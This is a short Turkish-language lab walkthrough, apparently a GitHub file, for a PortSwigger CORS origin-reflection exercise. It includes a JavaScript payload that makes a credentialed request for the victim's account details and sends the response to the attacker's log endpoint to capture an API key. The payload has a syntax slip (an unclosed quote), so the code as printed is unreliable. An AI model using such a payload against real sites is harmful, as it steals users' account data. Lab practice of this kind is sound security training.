-
Notifications
You must be signed in to change notification settings - Fork 0
/
1.txt
24 lines (18 loc) · 806 Bytes
/
1.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
LAB: CORS vulnerability with basic origin reflection
1 - wiener:peter kullanıcısı ile giriş yapın. Burp Suite -> Proxy -> Http History -> /accountDetails -> Repeater
Aşağıdaki headeri isteğe ekleyin.
Origin: https://example.com
2 - Cevap paketinin içinde Access-Control-Allow-Origin headeri bulunacaktır.
3 - Exploit servere girerek aşağıdaki payloadı kurbana gönderin.
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails/, true);
req.withCredentials = true;
req.send();
function reqListener() {
location = '/log?key=' + this.responseText;
};
</script>
4 - View exploit kısmından gelen cevapları inceleyin. GET /?log?key= ile başlayan cevapı URL DECODE ederek
APIKEY'i kaydedin.